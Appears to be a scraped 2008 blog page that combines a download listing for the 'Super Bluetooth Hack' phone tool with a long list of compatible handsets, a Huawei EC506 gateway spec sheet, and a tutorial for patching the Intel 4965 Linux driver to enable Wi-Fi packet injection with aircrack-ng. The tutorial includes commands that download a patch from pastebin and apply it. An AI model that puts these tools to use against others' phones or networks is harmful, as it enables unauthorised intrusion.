Super Bluetooth Hack 1.8

Free Download Super Bluetooth Hack 1.8

Compatible With:
Alcatel: One Touch 557, One Touch 557a, One Touch 735, One Touch 756, One Touch C550, One Touch C552, One Touch C552a, One Touch C750, One Touch S853
Asus: P525
Audiovox: SMT 5600
BenQ: A520, C30, EF51, P50
BenQ-Siemens: CL71, E61, S81, S88
BlackBerry: 6220, 6230, 6280, 6720, 7100, 7100i, 7130, 7130e, 7210, 7230, 7250, 7280, 7290, 7510, 7520, 7730, 8100, 8130, 8300, 8310, 8320, 8700, 8703e, 8707, 8800, 8820, 8830
CECT: A1000
Cingular: Cingular 2125, Cingular BlackJack
Dopod: Dopod 515, Dopod 557w, Dopod 565, Dopod 575, Dopod 585, Dopod 586w, Dopod 595, Dopod C720W
HP: iPAQ 510 Mobile Messenger
HTC: HTC MTeoR, HTC S310, HTC S620, HTC S650, HTC S710, P3400, P3450
Huawei: U526, U626
i-mate: i-mate Smartphone2, i-mate SP Jas, i-mate SP3, i-mate SP3i, i-mate SP5, i-mate SP5m, i-mate SPL
I-mobile: 510
Lenovo: V800
LG: B2000, B2050, B2070, B2100, B2150, C1100, C1150, C2000, C2500, C2600, C3100, C3300, C3400, CG225, CU400, CU500, F2400, G1600, G1610, G4015, G7100, KE770, KE800, KE820, KE970, KG110, KG195, KG200, KG220, KG225, KG240, KG245, KG290, KG300, KG320, KG800, LG KE500, LG-KE600, LG550, LX550, LX570, M4410, MG100a, MG105, MG220, MX510, P7200, S5200, T5100, TU500, U8210, U8290, U8330, U8500, VX9400, VX9900
LG Electronics: LG-B2060
Mitac: Mio 8390, Mio 8860, Mio 8870
Motorola: A1200, A760, A768, A780, A835, C155, C168, C257, C261, C290, C350, C350M, C380, C385, C390, C450, C550, C650, C975, E1000, E1070, E365, E380, E398, E398B, E398i, E550, E680, E680i, E770, E770-Vodafone, E790, E815, i830, i850, i930, K1, KZRK K1, L2, L6, L6i, L7-Vodafone, L71, Motorola Q, Motorola Q Plus, MPX220, PEBL U6, Razr V3, RAZR V3a, RAZR V3m, Razr V3x, RAZR V3xx, RAZR V3xxv, RAZR V6, RAZR2 V8, RAZR2 V9, RAZR2 V9m, RIZR Z10, RIZR Z8, ROKR E1, ROKR E2, ROKR E6, SLVR L7, SLVR L7e, SLVR L7i, SLVR L9, T720, V1050, V1075, V171, V177, V180, V186, V188, V190, V191, V195, V197, V220, V235, V300, V303, V360, V360-Vodafone, V365, V3c, V3i, V3m, V3r, V3t, V3v, V3x-Vodafone, V400, V500, V505, V525, V525M, V535, V545, V547, V550, V551, V555, V557, V600, V600i, V620, V635, V690, V80, V975, V980, V980M, W220, W315, W375, W490, W510, Z3
NEC: N600
Nokia: 2355, 2610, 2626, 2630, 2650, 2760, 2855i, 2865, 2865i, 3100, 3105, 3110c, 3120, 3125, 3152, 3155, 3155i, 3200, 3220, 3230, 3250, 3300, 3410, 3500, 3510, 3510i, 3530, 3586i, 3587, 3595, 3600, 3620, 3650, 3660, 5070, 5100, 5140, 5140i, 5200, 5300, 5310 XpressMusic, 5500, 6010, 6015, 6020, 6021, 6030, 6060, 6060v, 6061, 6070, 6080, 6085, 6086, 6100, 6101, 6102, 6102i, 6103, 6108, 6111, 6120c, 6125, 6126, 6131, 6133, 6151, 6155, 6165, 6165i, 6170, 6200, 6220, 6225, 6230, 6230i, 6233, 6234, 6235, 6235i, 6255, 6255i, 6260, 6265, 6265i, 6267, 6270, 6275i, 6280, 6288, 6300, 6310i, 6500c, 6500s, 6555, 6585, 6600, 6610, 6610i, 6620, 6630, 6650, 6651, 6670, 6680, 6681, 6682, 6708, 6800, 6810, 6820, 6822, 7200, 7210, 7250, 7250i, 7260, 7270, 7360, 7370, 7373, 7390, 7500, 7600, 7610, 7650, 7710, 8600 Luna, 8800, 8800 Sirocco, 8910i, 9210, 9290, 9300, 9500, E50, E51, E60, E61, E61i, E62, E65, E70, E90, N-Gage, N-Gage QD, N70, N70-1, N71, N72, N73, N75, N77, N80-1, N90, N91, N92, N93, N93i, N95, N95 8GB
O2: Ice
Orange: SPV, SPV C100, SPV C500, SPV C550, SPV C600, SPV C700, SPV e100, SPV E200
Panasonic: A210, SC3, VS2, VS3, VS6, X200P, X400, X400P, X500, X70
Pantech: PG-1400, PG-1410, PG-C300
Philips: 568, 588, 755, 756, 766, 768, 960, S890, S900
Qtek: 8100, 8500
QTEK: QTEK 7070, QTEK 8010, QTEK 8020, QTEK 8080, QTEK 8100, QTEK 8300, QTEK 8310, QTEK 8600
RoverPC: M1
Sagem: MY 302X, MY 301X, MY 400V, MY 400X, MY 401C, MY 401X, MY 401Z, MY 501C, MY 501X, MY 600v, MY 600x, MY 700X, MY C4-2, MY C5-2, MY C5-2 Vodafone, MY V-55, MY V-56, MY V-65, MY V-75, MY W-7, MY X-4, MY X-5-2T, MY X-6, MY X-7, MY X-8, MY X5-2, MY X5-2M, MY X6-2, MY Z-5, my411X, myX5-2v, Sagem myS-7
Samsung: A717, i300, i320, i320N, SCH A870, SGH A701, SGH A707, SGH C100, SGH C100G, SGH C130, SGH C140, SGH C160, SGH C170, SGH C200, SGH C207, SGH C207L, SGH C210, SGH C230, SGH C260, SGH C300, SGH C400, SGH C406, SGH C417, SGH D407, SGH D410, SGH D500, SGH D500C, SGH D500E, SGH D510, SGH D520, SGH D600, SGH D600E, SGH D720, SGH D800, SGH D807, SGH D820, SGH D830, SGH D836, SGH D840, SGH D900, SGH D900i, SGH E200, SGH E250, SGH E300, SGH E310, SGH E310C, SGH E315, SGH E316, SGH E330, SGH E330N, SGH E340, SGH E340E, SGH E350, SGH E350E, SGH E360, SGH E370, SGH E376, SGH E390, SGH E420, SGH E490, SGH E500, SGH E530, SGH E568, SGH E570, SGH E600, SGH E620, SGH E630, SGH E630C, SGH E690, SGH E700, SGH E710, SGH E715, SGH E720, SGH E728, SGH E730, SGH E736, SGH E760, SGH E780, SGH E800, SGH E808, SGH E810, SGH E820, SGH E830, SGH E840, SGH E870, SGH E878, SGH E890, SGH E898, SGH E900, SGH G600, SGH i300, SGH I320, SGH I607, SGH J600, SGH L760, SGH M600, SGH P200, SGH P300, SGH P310, SGH P400, SGH P510, SGH P777, SGH P850, SGH P900, SGH P906, SGH P910, SGH P920, SGH S300, SGH S300M, SGH S500, SGH T209, SGH T219, SGH T309, SGH T319, SGH T329, SGH T509, SGH T509S, SGH T519, SGH T609, SGH T619, SGH T629, SGH T729, SGH T809, SGH U600, SGH U700, SGH V200, SGH X100, SGH X100A, SGH X105, SGH X120, SGH X140, SGH X160, SGH X200, SGH X210, SGH X300, SGH X430, SGH X450, SGH X460, SGH X480, SGH X486, SGH X490, SGH X495, SGH X500, SGH X506, SGH X507, SGH X510, SGH X520, SGH X530, SGH X540, SGH X600, SGH X608, SGH X610, SGH X620, SGH X620C, SGH X630, SGH X636, SGH X640, SGH X640C, SGH X648, SGH X650, SGH X660, SGH X670, SGH X680, SGH X686, SGH X700, SGH X820, SGH X830, SGH Z107, SGH Z140, SGH Z170, SGH Z230, SGH Z240, SGH Z300, SGH Z370, SGH Z400, SGH Z400V, SGH Z500, SGH Z510, SGH Z530, SGH Z540, SGH Z560, SGH Z630, SGH Z720, SGH ZV10, SGH ZV40, SGH ZV50, SGH-i607, SPH A580, SPH A640, SPH A660, SPH A680, SPH A740, SPH A900, SPH A900P, SPH A920, SPH A940, SPH A960, SPH M500, SPH M510, SPH M610, SPH M620, Z130, Z150
Sanyo: S750, SCP-6600
Sendo: X
Sharp: 770SH, GX-L15, GX10, GX10i, GX15, GX17, GX20, GX22, GX25, GX29, GX30, GX30i, GXT15, TM100, TM150
Siemens: A31, A60, A65, A75, AL21, AP75, AX72, AX75, AX76, C55, C60, C62, C65, C65-Vodafone, C66, C72, C75, CF62, CF75, CF76, CX65, CX70, CX75, EF81, M50, M55, M56, M65, M75, MC60, ME75, MT50, S55, S57, S65, S75, SK65, SL42, SL45, SL55, SL65, SL75, ST60, SX1
Sony-Ericsson: D750, D750i, F500i, G700, G900, J200i, J210i, J220i, J230i, J300a, J300i, K200i, K300, K300a, K300i, K310, K310a, K310i, K320i, K500i, K508, K508c, K508i, K510a, K510i, K530i, K550i, K600, K600i, K608i, K610, K610i, K618i, K700, K700c, K700i, K750, K750i, K790a, K790i, K800i, K800iv, K810i, K850i, M600i, P1i, P800, P900, P910, P910a, P910i, P990i, S500i, S700, S700i, S710a, T226, T230, T250i, T290a, T290i, T610, T616, T630, T637, T650i, T68, V600, V600i, V630i, W200a, W200i, W300, W300i, W550c, W550i, W580i, W600c, W600i, W610i, W660i, W700i, W710i, W800c, W800i, W810i, W810iv, W830i, W850i, W850iv, W880i, W900i, W910i, W950i, W960, Z1010, Z200, Z300i, Z310i, Z310iv, Z500, Z500a, Z520a, Z520i, Z530i, Z550a, Z550i, Z558i, Z600, Z610i, Z710i, Z800
T-Mobile: MDA Dash, MDA Mail, SDA, SDA (US name), SDA II, SDA Music
Tatung: M1
VK Mobile: VK4000
Vodafone: v1210, v1240, VDA II, VDA IV

On Getjar.com

Wireless Gateway Huawei

2008-11-24T06:12:00.001-08:00

With Huawei EC506 Wireless Gateway, builing your network for data synchronization in your company is a lot simpler than you think. Simply connect the computers to EC506 with 4 Ethernet cables and you create your network. EC506 also supports EV-DO packet data service with a maximum transmission rate of 2.4Mbps, providing you with a high speed Internet experience.

1. Main Features
CDMA2000 1xEV-DO / CDMA2000 1xRTT / IS-95 Sharing 2.4 Mbps transmission rate with multiple users Build-in 10/100Mbps switch with 4 Ethernet ports Web-based management and configuration Build-in DHCP server, DNS relay and NAT Supporting High-quality voice and WLAN services* Note: Voice and WLAN services are optional functions

2.Specifications
Item
Description
Technical standard
CDMA2000 1xEV-DO Release 0 CDMA2000 1xRelease A IS-95 A/B
LAN:IEEE 802.3/802.3u
WLAN:IEEE 802.11b/g
Operating frequency
EV-DO: 450MHz WLAN: 2.4GHz
External interface
Four Ethernet interfaces
Antenna
one external antenna one built-in WLAN antenna
LED indicators
One power supply indicator One WAN interface indicator One WLAN interface indicator Four Ethernet interface indicators Five RSSI signal strength indicators
Dimension
220 mm × 180 mm × 35 mm
Weight
<>

Download Airowizard Manual

2008-11-24T06:05:00.000-08:00

AiroWizard 1.0 Beta Manual Download

Here AiroWizard Download

Packet Injection wifi Intel 4965 AGN

2008-11-24T06:03:00.000-08:00

Finally there exists a way how to solve packet injection with driver for wifi card Intel WiFi Link 4965AGN – operating system Linux. The one modified is the original driver iwlwifi (included for example in distribution Backtrack Linux). Be aware that the packet injection is functional but still it is an experimental thing (develop version). Besides the complicated compilation and occasional unstability so far (September 2008) the aireplay-ng attack -9 (t.j test injection) does not work on 100%.

Tutorial for packet injection Intel Pro Wireless 4965AGN (iwl4965)
What do you need:
- kernel 2.6.25 or higher*,
- kernel sources,
- compat-wireless-2.6 packet,
- aircrack-ng (=””> RC1),
- basic development tools (make, gcc, …),
- injection patche for driver.
Be aware that the instruction is for generic Linux. Your distribution, mainly in case of advanced packet administration (Debian, Ubuntu, etc.), can include required packets in source (then you don’t have to compile it manually from source code).

Preparation of kernel
Make sure that your kernel configuration includes mentioned configuration. Especially watch out for those that are as modules built-in and those that can be added.

Networking -> Wireless :
[M] Improved wireless configuration API
[*] nl80211 new netlink interface support
[*] Wireless extensions
[M] Generic IEEE 802.11 Networking Stack (mac80211)
[M] Generic IEEE 802.11 Networking Stack (DEPRECATED)
[M] IEEE 802.11 WEP encryption (802.1x)
[M] IEEE 802.11i CCMP support
[M] IEEE 802.11i TKIP encryption
[M] Software MAC add-on to the IEEE 802.11 networking stack

It is also necessary to turn on “Automatic kernel module loading” under “Loadable module support”, otherwise you will end if “module dependency errors”. At this moment you can suppose that your kernel is prepared and is running.

Driver compilation
Development version of drivers exists as a part of compat-wireless project. We will need the up-to-date packet. You can get it here.
Download to your home folder (or where ever you want),then download patches for iwlwifi drivers, including fragmentation patch for mac80211. Last mentioned is available here (download 2.6.26-wl version). The first available is hang up at paste.bin.

cd ~
tar xjf compat-wireless-2.6.tar.bz2
cd compat-wireless-2008-*
wget http://pastebin.com/pastebin.php?dl=f7bc96631 -O iwl4965-injection.patch
wget http://patches.aircrack-ng.org/mac80211_2.6.26-wl_frag.patch
patch -p1 < iwl4965-injection.patch
patch -p1 < mac80211_2.6.26-wl_frag.patch
make
make install [jako root!]
make unload; rmmod ssb mac80211 cfg80211 [all as root!]
make load [as root!]
echo options iwl4965 swcrypto=1 >> /etc/modprobe.d/options [all as root!]

This will allow to start it and to use the treated driver module. In case of success in the system there is registered interface “wlan0″ and “wmaster0″, the first can be seen by iwconfig.

Injecting
From the way how mac80211 works it is obvious that you can’t inject at the original interface wlan0. This is the moment when you can use the tool airmon-ng. By this tool you will create the interface mon0 that is able to do packet injection. Command:

# airmon-ng start wlan0

If the word error appears “iw”, program not found, download and compile. Program “iw” is pendent to “libnl” pack (downloadable here). If it is successful you can try again to run airmon-ng. The output should look like this:

# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Intel 4965 a/b/g/n iwl4965 - [phy0] (monitor mode enabled on mon0)

If you made it up to here your wireless card is probably ready for packet injection. Interface mon0 can be used for airodump-ng scan and aireplay-ng packet injection.

First reference and tutorial was published (in English) at tinyshell forum. The text is a translation from the record at aircrack-ng wiki. Detailed description can be found in the discussion here. The summary of steps for Ubuntu 8.04 (or here). The card ipw4965 is not at this moment available, so do the testing and your comments are welcomed at the discussion forum.
via airdump.net